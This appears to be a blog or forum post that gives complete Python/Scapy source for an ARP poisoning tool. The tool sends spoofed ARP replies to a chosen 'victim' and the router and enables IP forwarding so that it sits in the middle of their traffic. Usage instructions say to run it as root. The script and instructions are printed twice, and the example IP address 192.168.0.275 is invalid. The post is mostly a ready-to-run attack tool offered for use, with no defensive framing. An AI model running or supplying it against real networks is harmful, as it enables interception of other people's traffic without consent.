Heres the source for ARP poisioning using python
from scapy.all import *
import argparse
import signal
import sys
import logging
import time
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--victimIP", help="Choose the victim IP address. Example: -v 192.168.0.5")
parser.add_argument("-r", "--routerIP", help="Choose the router IP address. Example: -r 192.168.0.1")
return parser.parse_args()
def originalMAC(ip):
ans,unans = srp(ARP(pdst=ip), timeout=5, retry=3)
for s,r in ans:
return r[Ether].src
def poison(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
def restore(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
sys.exit("Restored!")
def main(args):
if os.geteuid() != 0:
sys.exit("Need Permission!")
routerIP = args.routerIP
victimIP = args.victimIP
routerMAC = originalMAC(args.routerIP)
victimMAC = originalMAC(args.victimIP)
if routerMAC == None:
sys.exit("Could not find router MAC address!")
if victimMAC == None:
sys.exit("Could not find victim MAC address!")
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('1\n')
def signal_handler(signal, frame):
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('0\n')
restore(routerIP, victimIP, routerMAC, victimMAC)
signal.signal(signal.SIGINT, signal_handler)
while 1:
poison(routerIP, victimIP, routerMAC, victimMAC)
time.sleep(1.5)
main(parse_args())
Example usage:
python arpspoof.py -v 192.168.0.275 -r 192.168.0.1
In order to run this script you’ll need to copy it into a text file locally, then give it two the two arguments it desires; victim IP and router IP. Make sure you run as root. As it stands scapy’s conf.verb variable is set to 1 which means it’ll output all the things that it’s doing so every time it sends a spoofed packet it’ll output that to the terminal. To remove this just set conf.verb=0 at the beginning of the script like perhaps after the logging.getLogger() part.
Install Scapy for python Click here
from scapy.all import *
import argparse
import signal
import sys
import logging
import time
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--victimIP", help="Choose the victim IP address. Example: -v 192.168.0.5")
parser.add_argument("-r", "--routerIP", help="Choose the router IP address. Example: -r 192.168.0.1")
return parser.parse_args()
def originalMAC(ip):
ans,unans = srp(ARP(pdst=ip), timeout=5, retry=3)
for s,r in ans:
return r[Ether].src
def poison(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
def restore(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
sys.exit("Restored!")
def main(args):
if os.geteuid() != 0:
sys.exit("Need Permission!")
routerIP = args.routerIP
victimIP = args.victimIP
routerMAC = originalMAC(args.routerIP)
victimMAC = originalMAC(args.victimIP)
if routerMAC == None:
sys.exit("Could not find router MAC address!")
if victimMAC == None:
sys.exit("Could not find victim MAC address!")
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('1\n')
def signal_handler(signal, frame):
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('0\n')
restore(routerIP, victimIP, routerMAC, victimMAC)
signal.signal(signal.SIGINT, signal_handler)
while 1:
poison(routerIP, victimIP, routerMAC, victimMAC)
time.sleep(1.5)
main(parse_args())
Example usage:
python arpspoof.py -v 192.168.0.275 -r 192.168.0.1
In order to run this script you’ll need to copy it into a text file locally, then give it two the two arguments it desires; victim IP and router IP. Make sure you run as root. As it stands scapy’s conf.verb variable is set to 1 which means it’ll output all the things that it’s doing so every time it sends a spoofed packet it’ll output that to the terminal. To remove this just set conf.verb=0 at the beginning of the script like perhaps after the logging.getLogger() part.
Install Scapy for python Click here